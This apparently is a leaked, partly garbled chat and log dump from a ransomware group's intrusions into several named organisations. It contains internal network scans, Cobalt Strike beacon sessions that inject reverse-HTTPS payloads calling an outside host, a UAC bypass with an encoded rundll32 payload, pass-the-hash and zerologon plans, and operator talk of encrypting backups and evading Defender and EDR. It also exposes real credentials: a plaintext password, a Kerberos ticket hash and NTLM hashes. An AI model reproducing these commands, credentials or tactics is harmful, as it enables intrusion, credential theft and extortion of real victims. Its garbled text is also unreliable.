   IPv4 Address . . . . : 192.168.168.73(Preferred)
   Subnet Mask . . . . : 255.255.255.0
   Lease Obtained... on... ♪ Monday, September 14, 2020 6:18:32 PM ♪
   Lease Expires . . . . .: Tuesday, September 22, 2020 6:18:28 PM
   Default Gateway . . . . : 192.168.168.1
   DHCP Server . . . . : 192.168.168.10
   DHCPv6 IAID . . . . : 110918639
   DHCPv6 Client DUID . . . . : 00-01-00-01-24-C4-86-07-9C-7B-EF-AD-76-64
   DNS Servers . . . . : 192.168.168.10
   Primary WINS Server . . . . : 192.168.168.10
   NetBIOS over Tcpip-- : Enabled

``Not sure there's going to be a session again kidalidll kinli?[ ](https://mediaeveryone.com/group/sccy-com?msg=ZRJ3v6qNBEGCHKYis) here```
10.1.4.250:80 --alibi
 
10.1.4.211:443 -- it did not open
10.1.4.211:80
 
10.1.4.151:80 -- did not open
 
10.0.0.104:22 (SSH-2.0-dropbear_2018.76)
10.0.0.104:443
10.0.0.104:80 -- 503 Service Not Available
 
10.0.0.210:80 -- Web Service tab, did not open
``````
10.0.0.5:445 (platform: 500 version: 10.0 name: SCCY-DC domain: SCCY)
10.0.0.17:445 (platform: 500 version: 10.0 name: SCCY-14 domain: SCCY)
10.0.0.24:445 (platform: 500 version: 6.1 name: 0EA78803 domain: ZOLLER)
10.0.0.26:445 (platform: 500 version: 10.0 name: SCCY-LT07 domain: SCCY)
10.0.0.38:445
10.0.0.40:445 (platform: 500 version: 10.0 name: SCCY-04 domain: SCCY)
10.0.0.41:445 (platform: 500 version: 10.0 name: SCCY-10 domain: SCCY)
10.0.0.45:445
10.0.0.51:445 (platform: 500 version: 6.1 name: SCCY-DATTO domain: WORKGROUP)
10.0.0.57:445 (platform: 500 version: 10.0 name: SCCY-03 domain: SCCY)
10.0.0.59:445 (platform: 500 version: 10.0 name: SCCY-05 domain: SCCY)
10.0.0.62:445 (platform: 500 version: 10.0 name: SCCY-19 domain: SCCY)
10.0.0.63:445
10.0.0.67:445 (platform: 500 version: 10.0 name: SCCY-LT04 domain: SCCY)
10.0.0.71:445 (platform: 500 version: 10.0 name: SCCY-LT05 domain: SCCY)
10.0.0.75:445 (platform: 500 version: 10.0 name: SCCY-LT3 domain: SCCY)
10.0.0.76:445 (platform: 500 version: 10.0 name: SCCY-01 domain: SCCY)
10.0.0.82:445 (platform: 500 version: 10.0 name: CONNIE-MICRO domain: SCCY)
10.0.0.83:445
10.0.0.84:445 (platform: 500 version: 10.0 name: SCCY-02 domain: SCCY)
10.0.0.89:445 (platform: 500 version: 10.0 name: JOE-AIO2 domain: SCCY)
10.0.0.91:445 (platform: 500 version: 10.0 name: SCCY-RECEIVING domain: SCCY)
10.0.0.93:445 (platform: 500 version: 6.1 name: QVPRO-PC domain: SCCY)
10.0.0.102:445 (platform: 500 version: 10.0 name: SCCY-16 domain: SCCY)
10.0.0.103:445 (platform: 500 version: 10.0 name: JOE-BOXX-W10 domain: SCCY)
10.0.0.110:445 (platform: 500 version: 10.0 name: MFGWIN10-1 domain: SCCY)
10.0.0.111:445 (platform: 500 version: 10.0 name: SCCY-12 domain: SCCY)
10.0.0.113:445 (platform: 500 version: 10.0 name: QATRACKING domain: SCCY)
10.0.0.116:445 (platform: 500 version: 10.0 name: SCCY-18 domain: SCCY)
10.0.0.118:445 (platform: 500 version: 10.0 name: SCCY-15 domain: SCCY)
10.0.0.119:445 (platform: 500 version: 10.0 name: SCCY-09 domain: SCCY)
10.0.0.123:445 (platform: 500 version: 10.0 name: SCCY-11 domain: SCCY)
10.0.0.128:445 (platform: 500 version: 10.0 name: SCCY-08 domain: SCCY)
10.0.0.146:445 (platform: 500 version: 10.0 name: SCCY-06 domain: SCCY)
10.0.0.147:445 (platform: 500 version: 10.0 name: SCCY-21 domain: SCCY)
10.0.0.148:445 (platform: 500 version: 10.0 name: SCCY-13 domain: SCCY)
10.0.0.252:445 (platform: 500 version: 10.0 name: TS domain: SCCY)
10.0.30.117:445
10.0.30.118:445
10.0.30.123:445
10.0.30.143:445 (platform: 500 version: 10.0 name: SCCY-07 domain: SCCY)
10.0.30.147:445 (platform: 500 version: 10.0 name: SCCY-TN01 domain: SCCY)
Scanner module is complete
``````
10.0.0.104:22 (SSH-2.0-dropbear_2018.76)
10.0.0.104:443
10.0.0.104:80 --br

10.0.0.122:443
10.0.0.122:80

10.0.0.132:22 (SSH-2.0-OpenSSH_7.8) --- BR
10.0.0.132:443
10.0.0.132:80

10.0.0.134:22 (SSH-2.0-OpenSSH_7.8) ---BR
10.0.0.134:443
10.0.0.134:80

10.0.0.151:22 (SSH-2.0-OpenSSH_6.6) --BR
10.0.0.151:443
10.0.0.151:80

10.0.0.152:80

10.0.0.153:80

10.0.0.15:443

10.0.0.154:80

10.0.0.16:443 PRINTER
10.0.0.16:80

10.0.0.199:443 BROWSER!!!!!    VPN
10.0.0.199:80

10.0.0.200:443 BROWSER!!! CANON
10.0.0.200:80

10.0.0.201:443 BROWSER!!!    CANON
10.0.0.201:80

10.0.0.202:80 HZ BROWSER!!!     ALIBI AV?

10.0.0.203:443 CANON
10.0.0.203:80

10.0.0.204:443 CANON
10.0.0.204:80

10.0.0.205:443 CANON
10.0.0.205:80

10.0.0.206:443 CANON
10.0.0.206:80

10.0.0.210:80 ?????

10.0.0.215:80 ZEBRA

10.0.0.21:80 NETGEAR router

10.0.0.230:22 (SSH-2.0-mpSSH_0.2.1) HP iLO SQLSRVR VHOST
10.0.0.230:80

10.0.0.235:80

10.0.0.236:80

10.0.0.237:80

10.0.0.24:80 IIS

10.0.0.252:443 RD Web Access
10.0.0.252:80

10.0.0.29:22 (SSH-2.0-dropbear_2018.76) HZ ????
10.0.0.29:443
10.0.0.29:80

10.0.0.30:22 (SSH-2.0-dropbear_2013.59)

10.0.0.34:443
10.0.0.34:80

10.0.0.39:22 (SSH-2.0-OpenSSH_6.1)

10.0.0.42:22 (SSH-2.0-OpenSSH_6.1)

10.0.0.43:80 ALLWORKS

10.0.0.4:443 NAS Synology !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1
10.0.0.4:80

10.0.0.46:22 (SSH-2.0-dropbear_2018.76) HZ ????
10.0.0.46:443
10.0.0.46:80



10.0.0.49:22 (SSH-2.0-OpenSSH_6.1)

10.0.0.50:443 CANON
10.0.0.50:80

10.0.0.51:443 NAS ?!?!?
10.0.0.51:80

10.0.0.52:22 (SSH-2.0-dropbear_2018.76) HZ ?????
10.0.0.52:443
10.0.0.52:80

10.0.0.55:443
10.0.0.55:80

10.0.0.67:80

10.0.0.6:80

10.0.0.90:443
10.0.0.90:80

10.0.0.99:80

10.0.30.100:22 (SSH-2.0-dropbear_2018.76) HZ ?????
10.0.30.100:443
10.0.30.100:80

10.0.30.101:22 (SSH-2.0-dropbear_2018.76) HZ ?????
10.0.30.101:443
10.0.30.101:80

10.0.30.119:443
10.0.30.119:80

10.0.30.126:80

10.0.30.127:22 (SSH-2.0-dropbear_2018.76) HZ ???
10.0.30.127:443
10.0.30.127:80

10.0.30.128:80

10.0.30.129:80

10.0.30.130:80

10.0.30.131:80

10.0.30.132:80

10.0.30.133:80

10.0.30.30:22 (SSH-2.0-OpenSSH_6.1)

10.0.30.4:443 SWITCH
10.0.30.4:80

10.0.30.5:443
10.0.30.5:80

 10.0.40.2:443
10.0.40.2:80

``````

10.1.4.250:80 -br

10.1.4.211:443 -br
10.1.4.211:80

10.1.4.175:443 -NAS
10.1.4.175:80
10.1.4.175:22 (SSH-2.0-OpenSSH_7.4)
10.1.4.175:445

10.1.4.162:80 - phone?

10.1.4.153:80 -phone

10.1.4.152:80 -phone

10.1.4.151:80 -br

10.1.4.80:80 -phone

10.1.4.254:22 (SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2)

10.1.4.154:22 (SSH-2.0-dropbear_2016.74)

10.1.4.168:22 (SSH-2.0-OpenSSH_6.1)

10.1.4.99:445


10.1.4.205:445

10.1.4.210:445

10.1.4.221:445

10.1.4.230:445
``````
10.0.30.147:3389
10.0.30.143:3389
10.0.30.133:80
10.0.30.132:80
10.0.30.131:80
10.0.30.130:80
10.0.30.129:80
10.0.30.128:80
10.0.30.127:443
10.0.30.127:80
10.0.30.126:80
10.0.30.127:22 (SSH-2.0-dropbear_2018.76)
10.0.30.119:8080
10.0.30.119:443
10.0.30.119:80
10.0.30.101:443
10.0.30.101:80
10.0.30.100:443
10.0.30.100:80
10.0.30.1:8080
10.0.30.100:22 (SSH-2.0-dropbear_2018.76)
10.0.30.101:22 (SSH-2.0-dropbear_2018.76)
10.0.30.30:22 (SSH-2.0-OpenSSH_6.1)
10.0.30.117:445
10.0.30.123:445
10.0.30.143:445 (platform: 500 version: 10.0 name: SCCY-07 domain: SCCY)
10.0.30.147:445 (platform: 500 version: 10.0 name: SCCY-TN01 domain: SCCY)
8 are not pinged, 12 of them are dcpc's that have some sort of exh in ad_ocmp
```
Jdodc50.jdossn.local
Jdodc51.jdossn.local
JDOdc65.jdossn.local
JDODC12.jdossn.local
JDODC64.jdossn.local
JDODC61.jdossn.local
JDODC63.jdossn.local
JDODC66.jdossn.local
JDODC62.jdossn.local
JDOEXVS01.jdossn.local
JDOEXVS03.jdossn.local
JDOEXHYBRID02.jdossn.local
JDOEXCH03.jdossn.local
JDOEXHYBRID01.jdossn.local
jdoexhybrid03.jdossn.local
JDOEXVS02.jdossn.local
JDOINFADMIN01.jdossn.local
JDODC67.jdossn.local
JDODC68.jdossn.local
JDODC69.jdossn.local
``````
User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:24:41> shell ping JDOEXVS01 -n 1
[*] Tasked beacon to run: ping JDOEXVS01 -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Ping request could not find host JDOEXVS01. Please check the name and try again.

User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:25:28> shell ping JDOEXVS03 -n 1
[*] Tasked beacon to run: ping JDOEXVS03 -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Ping request could not find host JDOEXVS03. Please check the name and try again.

User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:26:02> shell ping JDOEXHYBRID02 -n 1
[*] Tasked beacon to run: ping JDOEXHYBRID02 -n 1
[+] host called home, sent: 54 bytes
[+] received output:

Pinging JDOEXHYBRID02.jdossn.local [172.31.190.92] with 32 bytes of data:
Request timed out.

Ping statistics for 172.31.190.92:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:26:51> shell ping JDOEXCH03 -n 1
[*] Tasked beacon to run: ping JDOEXCH03 -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Ping request could not find host JDOEXCH03. Please check the name and try again.

User 7[W08872611194]nddeviowlbo/3856|202020Oct24 03:27:18> shell ping JDOEXHYBRID01 -n 1
[*] Tasked beacon to run: ping JDOEXHYBRID01 -n 1
[+] host called home, sent: 54 bytes
[+] received output:
Ping request could not find host JDOEXHYBRID01. Please check the name and try again.

User 7[W08872611194]nddeviowlbo/3856|202020Oct24 03:27:49> shell ping JDOEXHYBRID03 -n 1
[*] Tasked beacon to run: ping JDOEXHYBRID03 -n 1
[+] host called home, sent: 54 bytes
[+] received output:

Pinging JDOEXHYBRID03.jdossn.local [172.31.190.93] with 32 bytes of data:
Request timed out.

Ping statistics for 172.31.190.93:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

User 7[W08872611194]nddeviowlbo/3856|202020Oct24 03:28:24> shell ping JDOEXVS02 -n 1
[*] Tasked beacon to run: ping JDOEXVS02 -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Ping request could not find host JDOEXVS02. Please check the name and try again.

``This is the first time I have heard of lumisco.com, matches, gpjdahocorpin? You now have 3 grids in operation, before you leave, report on each: what was done in the current task, what difficulties, what vectors and so on, started up yes?
oh how well in the test lab on Windows 10 version 1909 with defender on
SharpFodhelperBypass works (https://github.com/FatRodzianko/SharpFodhelperBypass)
sample run - execute-assembly /home/user/Desktop/SharpFodhelperBypass.exe Y21kIC9jIHJ1bmRsbDMyIEM6XFByb2dyYW1EYXRhXHg2NC5kbGwgZW50cnlQb2ludA==
command in base64 (cmd /c rundll32 C:\ProgramData\x64.dll entryPoint)[ ](https://mediaeveryone.com/channel/general?msg=hhBzAGf6Z9ZQ27wgX) This thing works in a test lab on win 10
It opens cmd under admin, but you can't give it arguments, i.e. tell it to run our exe or specify a command.
what can be done with it then? https://github.com/hfiref0x/UACMEhttps://github.com/L3cr0f/DccwBypassUACэто till lunchtime the problem is above + you need to look for methods of bypassing UAC, or fresh spoolsv[ ](https://mediaeveryone.com/channel/general?msg=yjAALDWw963Zv3b8j) On the forum is, gave the link above
Finish it is not realistic, I think it's infinite:space_invader:mindmap finished?
LEADMIN
Deere0419!
``have a clear''.
$krb5tgs$23$aspsql2svc$mapciasp.com$MSSQLSvc/ASPSQL2.mapciasp.com:1433$7fbb03b44cb498cea3660dc0f17f4326$ceb193be15a7b0299bebe7bab2a50a7a53ea924fc555d8111667f9ab4de458b220f36f08a7e3b1965bbca55cf7f09f1ef255ad630bac1580000e3ad222a320d342db4bc833e2e4c257e52553197bd338defb57b236c9e6192090c832a419e665b511163e0bafaa90690232dde95a5650f6a6b8fd5c78fd5e49ec4879816f7441971213d2861ad7e20412c549cc8517677d53552b83756a2f54baeb38497f60e8d7eb60b9d7a19bff49501606fdde848e2da8b8a128bab34c77fff5aea18d130c6c2818877ef059fb0009a8dafe7c03028c02ddde72672bb4e09bfbd6f6b91aff72c0e45203a12307ce38d4cfaaf48cc5b1d000e68c11bea41766b207657ee15bf5115caee8b5f42ac242857f921dc68963365579ab5245a9a261d2eb551e5e8fea013839d1aa991483c2ef6fe3117974aad6d6e6e358d4a3af20f6760c5aa13a6bae5ca8dfa9e2941744d664212581a6206695ac7d817f4f6a0114e5fc5cdf87bb5f3887c24dc31a71ebc0bf75c668e6bc1f422ac0e38d06570948272e87e7d532bb690ee6f62287866abed4b45b094f37ad2256a971bde09f18628d8e700fe5fa66402b0f656b03ffbce97d66e7035a7704a341e05b78f627ca42bc06c0154b4033889e7475b1b10d442a54f9f95e3ae67260de4fab6226b210fc0ca67da8785b42b01f1d84bac9ca7860dfbamap#2013
``+your listings separately, where there are no files, you haven't uploaded the listings to the megs? 1.done.overland.com till tomorrow good night, tomorrow by 6noon then we're all there, all those alive are ok? bitches) there's one full disk encrypted - file dump
and 60% c backups + filesfflagged us and part of the servers(what is the movement at least 40 minjm us encrypted)
overland
	servers
		hell:76
		alive:36
		closed:36
	armies
		for hell:327
		alive:82
		closed:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82

ovrweb
	servers
		by hell:10
		alive:5
		shut down:5

ovrcomm
	servers
	by hell:6
	alive:3
	closed:3
``exe started.
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 229999 bytes
[-] relocation truncated to fit (distance between executable code and other data is >4GB)
``If possible, it's better to encrypt two disks with backups
1 with servers, we'll use it, there is one 2tb file
2 with the extended backups of whines and so on, we'll pull it in and encrypt it[ ](https://mediaeveryone.com/group/overland-com?msg=H3QhNGwn2i6eN6Dv7) .``
SARAH-2.overland.com
SERVICE-16.overland.com
TESTLAB-PACK2.overland.com
PHOTO-03.overland.com
SHAENA-3.overland.com
SERVICE-14.overland.com
TESTLAB.overland.com
DC-RETURNS9.overland.com
DC-TAGGING2.overland.com
TESTLAB-PACKv9.overland.com
PHOTO-04.overland.com
WEBDEV-1.overland.com
DC-ADHOST.overland.com
DC-HATS.overland.com
ACCOUNTING-02.overland.com
RONOPENSHAW3.overland.com
SERVICE-04.overland.com
LOGAN.overland.com
INVENTORY-03.overland.com
DC-RETURNS4.overland.com
MAHESH-2.overland.com
DC-RETURNS5.overland.com
STATION-03.overland.com
SERVICE-08.overland.com
WEBDEV-3.overland.com
ACCOUNTING-01.overland.com
ACCOUNTING-05.overland.com
INVENTORY-04.overland.com
DC-PACK3a.overland.com
SERVICE-20.overland.com
GABRIEL-3.overland.com
TODD-DESK2.overland.com
ECOMM-04.overland.com
JAY-OFFICE2.overland.com
DC-PACK6.overland.com
INVENTORY-05.overland.com
LARRY-2.overland.com
DC-SHIPPING4.overland.com
LAPTOP-D2.overland.com
ROGERLEAHY-2.overland.com
ACCT2.overland.com
SERVICE-03.overland.com
FACILITIES-02.overland.com
ACCOUNTING-04.overland.com
DC-WAREHOUSE105.overland.com
SERVICE-02.overland.com
STATION-02A.overland.com
TESTLAB-HQv9.overland.com
LINDA-2.overland.com
WEBDEV-4.overland.com
LAPTOP-D3.overland.com
ACCOUNTING-06.overland.com
ACCOUNTING-03.overland.com
MARIE-DESK.overland.com
DC-PACK8.overland.com
DC-PACK2.overland.com
ECOMM-05.overland.com
OVR059-SHIPPING.overland.com
DC-RETURNS10.overland.com
CONFERENCE-1.overland.com
SERVICE-06.overland.com
SERVICE-09.overland.com
APRIL-DESKTOP.overland.com
ToddsBackup.overland.com
SERVICE-17.overland.com
TAGGING.overland.com
SERVICE-12.overland.com
DC-PACK5a.overland.com
SERVICE-15.overland.com
DC-RETURNS8.overland.com
HQSHIP-2.overland.com
DC-WAREHOUSE107.overland.com
WENDI-LAPTOP2.overland.com
SERVICE-01.overland.com
STATION-10a.overland.com
LAPTOP-I1.overland.com
DC-PACK7.overland.com
AMBER-OFFICE2.overland.com
SERVICE-05.overland.com
STATION-09A.overland.com
TOM-LAPTOP.overland.com
DC-WAREHOUSE106.overland.com
``````
OSCAR-TESTDB.overland.com
RDPAPP1.overland.com
HYPERV-DEV3.overland.com
HYPERVHOSTRMS.overland.com
Shouldn't a machine account be displayed as LA?
```
[+] 10.10.20.5:445 - 10.10.20.5:445 - Success: '.\DC$:aad3b435b51404eeaad3b435b51404ee:203d17368b3abd4e470f5adafbc27b5c'
``And smb_login works fine with this? although the credentials are fine, I try to run it, but in the lab, the machine account doesn't work at all
```
[-] 10.10.20.5:445 - Exploit failed [no-access]: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED
``Well, it must have been noticed by the regular psec module, but with an additional option.
 > use auxiliary/admin/smb/psexec_command

[!] * The module auxiliary/admin/smb/psexec_command is deprecated!              *
[!] * This module will be removed on or about 2020-09-16
[!] *Use exploit/windows/smb/psexec and the 'Command' target with the cmd/windows/generic payload

``[ ](https://mediaeveryone.com/group/silencershop-com?msg=yJXAXaremuj9HSLFr) it's no longer available in new versions= )hmm, that's also an option)
forgot about it and why not use psexec_command from metasploit?
I have an idea to upload the dll to the balloon on the dk, reset the password from the machine account with a zerologon and use Sharp-SMBExec to run it there
But Sharp-SMBExec doesn't work on the test lab...
```
beacon> execute-assembly /home/user/Desktop/SharpTools/Sharp-SMBExec.exe hash:203d17368b3abd4e470f5adafbc27b5c username:DC$ domain:. target:DC.testlab.local command:rundll32 C:\x64.dll entryPoint -debug
[*] Tasked beacon to run .NET program: Sharp-SMBExec.exe hash:203d17368b3abd4e470f5adafbc27b5c username:DC$ domain:. target:DC.testlab.local command:rundll32 C:\x64.dll entryPoint -debug
[+] host called home, sent: 172333 bytes
[+] received output:
AdminCheck is false
String is not empty
Connected to DC.testlab.local
Current Stage: NegotiateSMB
Using SMB2
SMB Signing is Enabled
Current Stage: NegotiateSMB2
Current Stage: NTLMSSPNegotiate
Authenticating to DC.testlab.local
Authentication Successful
Login Status: True
Service Name is OGFLSZGUECWHMJMQLQRH
Current Stage TreeConnect
Current Stage CreateRequest
Current Stage RPCBind
Current Stage ReadRequest
Current Stage OpenSCManagerW
Current Stage ReadRequest
Current Stage CheckAccess
Something went wrong with DC.testlab.local
Warning: Service not deleted. Please delete Service "OGFLSZGUECWHMJMQLQRH" manually.
``https://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/``.
 actually helps to search for pcs assigned to users
namely, in the "search for techs" task.
you select them from ad_users and use this tool to find their PCs where there will be valuable information about the network, just be information about edr, backups, etc.
Search for keywords like network, admin, tech, etc.

``[ ](https://mediaeveryone.com/channel/general?msg=N9P98kTsatAzhy5fZ) 1This one https://mediaeveryone.com/channel/general?msg=kKPqGtPJd8Kpmd6BCехе under which you write in trethThere? https://mediaeveryone.com/channel/general?msg=Xn2ZPrF95sAJ44ecHтак is not it? I asked if you collected sharpshooter and you said yes``.
https://github.com/HunnicCyber/SharpSniper
``wft?[ ](https://mediaeveryone.com/channel/general?msg=44d8DTrJDJMDKS9Qf) 2[ ](https://mediaeveryone.com/channel/general?msg=rJXGJZcTyHBBMgpxP) 1 lol?dep can you build a case? no luck trying to get into the likenic.com:thumbsup:there every time the load increases by about 12 bytes I will try to get into the previous kobuneasamen is there mb?i can't go any farther i can't go any further i just restarted and couldn't go any further then kobalt hung hung up an empty archive and in bicon the output of adfind and started i just started the output of adfind from the toolchain i don't understand did you start the output of adfind?com if all the sessions flew away means the domain in the hsa the second coba? and in general i have worked there with the same domain if you mean likenic.com i have not tried since yesterday to go there the second coba there are sessions?the domain went to the block through citrix no new ones saved all the sessions at the same time all the sessions failed memory protection `[+] Sophos Found!` and edr_query? I searched the files - sorhosbelt did not detect it tell me what edr? it is not laon from the user vicinhos? I have discounted it for example the host too and you only jump in winlogon?
beacon> inject 1108 x64 https
[*] Tasked beacon to inject windows/beacon_https/reverse_https (wikibros.com:443) into 1108 (x64)
[+] host called home, sent: 261139 bytes
[-] could not open process 1108: 5
beacon> elevate svc-exe
[*] Tasked beacon to run windows/beacon_https/reverse_https (wikibros.com:443) via Service Control Manager (\127.0.0.1\ADMIN$\05d9cdb.exe)
[+] host called home, sent: 291332 bytes
[-] Could not start service 05d9cdb on .: 5
``I'm looking at the list balloonnu yeah where you jumping you admin? The session under the system where I took off the hashdump, fell off, sagged for an hour, this computer is not pinged

now jumping from the first car to different cars and trying to get the system, it does not let me inject to docomputer where hash knocked out i thought i had a long time ago...so throw it straight to the gennel and it is well configured
has different methods of dumping lsaas etc it's autopavn essentially for when you have a bunch of lsaas available, fun thing spend time once set it up correctly
so that you have the vpc set up for this fuckin' thing right at your fingertips, use this://github.com/Hackndo/Isassto all you can't get it right, it's a win-server 0% loss
139.62.200.190
139.62.200.188
139.62.200.189
139.62.200.114
139.62.192.79
139.62.200.68
139.62.200.101
139.62.200.100
139.62.192.172
139.62.192.187
139.62.192.188
139.62.201.145
139.62.201.141
139.62.234.116
139.62.201.144
139.62.201.146
139.62.201.140
139.62.192.103
139.62.234.41
139.62.201.31
139.62.200.202
139.62.200.203
172.30.240.22
139.62.201.207
139.62.192.164
172.30.243.242
139.62.192.35
139.62.192.200
172.30.243.243
172.30.243.244
172.30.243.241
139.62.192.129
139.62.201.30
10.14.255.11
139.62.193.113
139.62.192.110
139.62.192.200
139.62.193.61
139.62.63.209
139.62.192.78
139.62.192.121
139.62.192.123
139.62.192.122
139.62.192.152
139.62.192.124
139.62.192.153
139.62.200.129
139.62.201.208
139.62.200.20
139.62.200.74
139.62.200.128
139.62.200.221
139.62.234.30
139.62.192.48
139.62.193.78
139.62.200.75
139.62.200.31
139.62.63.213
139.62.201.18
139.62.192.41
139.62.200.32
139.62.200.127
139.62.201.209
139.62.200.125
139.62.200.73
139.62.200.158
139.62.200.169
139.62.200.178
139.62.233.12
139.62.200.27
139.62.201.41
139.62.233.23
139.62.192.59
139.62.200.78
139.62.200.79
139.62.200.168
139.62.192.127
139.62.200.91
139.62.200.124
139.62.101.22
139.62.200.104
139.62.234.55
139.62.192.61
139.62.192.60
139.62.192.154
139.62.192.155
139.62.200.133
139.62.101.21
139.62.101.20
139.62.192.125
139.62.192.128
139.62.192.71
139.62.193.34
139.62.192.58
139.62.232.13
139.62.201.38
139.62.192.56
139.62.126.178
139.62.192.57
139.62.192.75
139.62.192.63
139.62.192.54
139.62.192.47
139.62.192.62
139.62.192.201
139.62.192.231
139.62.193.117
139.62.193.104
139.62.192.228
139.62.192.202
139.62.192.206
139.62.192.229
139.62.192.39
139.62.192.230
139.62.200.145
139.62.193.116
139.62.63.150
139.62.192.36
139.62.200.50
139.62.192.198
139.62.234.40
139.62.192.199
139.62.247.104
139.62.192.178
139.62.232.253
139.62.193.115
139.62.192.162
139.62.200.88
139.62.200.119
139.62.233.34
139.62.101.42
139.62.193.114
139.62.192.113
139.62.192.166
139.62.192.165
139.62.192.33
139.62.200.177
139.62.200.87
139.62.200.179
139.62.192.193
139.62.192.213
139.62.244.4
139.62.192.189
139.62.192.184
139.62.193.74
139.62.193.72
139.62.200.89
139.62.192.163
139.62.193.76
139.62.193.73
139.62.200.34
139.62.192.185
139.62.193.70
139.62.247.108
139.62.193.71
139.62.192.158
139.62.201.36
139.62.201.19
139.62.192.139
139.62.201.40
139.62.192.4
139.62.192.161
139.62.63.166
139.62.192.68
139.62.63.246
139.62.201.211
139.62.247.109
139.62.232.249
139.62.192.160
139.62.192.159
139.62.247.112
139.62.247.111
139.62.192.242
139.62.200.174
139.62.247.110
139.62.232.248
139.62.192.114
139.62.200.121
139.62.232.247
139.62.232.251
139.62.200.173
139.62.232.252
139.62.192.73
139.62.192.38
139.62.200.176
139.62.200.175
139.62.192.219
139.62.192.171
139.62.192.186
139.62.192.136
139.62.200.172
139.62.192.135
139.62.192.146
139.62.234.19
139.62.200.134
139.62.200.220
139.62.200.135
139.62.200.137
139.62.233.27
139.62.193.10
172.30.243.254
139.62.200.110
139.62.200.85
139.62.201.201
139.62.193.5
139.62.192.133
172.18.65.99
139.62.193.9
139.62.234.24
139.62.192.126
139.62.193.8
139.62.201.198
139.62.192.32
139.62.192.112
139.62.234.23
139.62.192.134
139.62.192.132
139.62.200.66
139.62.63.106
139.62.63.186
139.62.192.67
139.62.200.113
139.62.200.59
139.62.193.45
139.62.192.66
139.62.63.11
139.62.192.246
172.30.243.253
139.62.192.130
172.30.243.251
139.62.193.42
172.30.243.252
139.62.200.107
139.62.200.83
139.62.200.109
139.62.234.96
139.62.192.90
139.62.201.143
139.62.193.41
139.62.193.43
139.62.200.64
139.62.201.142
139.62.193.7
139.62.201.67
139.62.200.151
139.62.234.64
139.62.201.210
139.62.193.3
139.62.193.1
139.62.193.6
139.62.200.204
139.62.200.65
139.62.200.106
139.62.200.108
139.62.200.153
139.62.192.223
139.62.60.52
139.62.200.123
139.62.200.69
139.62.193.37
139.62.200.148
139.62.234.29
139.62.193.2
139.62.192.34
139.62.200.111
139.62.193.44
139.62.200.62
139.62.232.12
139.62.193.11
139.62.193.16
139.62.193.38
139.62.234.121
139.62.193.4
139.62.192.9
139.62.193.105
139.62.234.61
139.62.193.29
139.62.200.61
139.62.192.190
139.62.193.40
139.62.200.112
139.62.193.106
139.62.200.118
139.62.200.77
139.62.193.39
139.62.200.117
139.62.200.72
139.62.200.116
139.62.200.132
139.62.200.191
139.62.192.81
139.62.201.87
139.62.233.16
139.62.192.109
139.62.200.120
139.62.233.13
``Hosts pinged, I separate up from down, then brutan[ ](https://mediaeveryone.com/group/unf-edu?msg=WhhevaBFjcbE9Sv8q) these are the ones that fit from here is the total list got above? then ping and brutservacs gather more is the edukeyserver OS? is that what we have?
[+] 139.62.58.7:445 - 139.62.58.7:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.59.172:445 - 139.62.59.172:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.59.150:445 - 139.62.59.150:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.59.213:445 - 139.62.59.213:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator
[+] 139.62.59.240:445 - 139.62.59.240:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator
[+] 139.62.58.100:445 - 139.62.58.100:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.59.116:445 - 139.62.59.116:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.58.236:445 - 139.62.58.236:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.59.79:445 - 139.62.59.79:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.58.67:445 - 139.62.58.67:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.59.20:445 - 139.62.59.20:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.57.184:445 - 139.62.57.184:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.59.234:445 - 139.62.59.234:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f70886839806891019eb43397e2668' Administrator
[+] 139.62.58.117:445 - 139.62.58.117:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.57.113:445 - 139.62.57.113:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
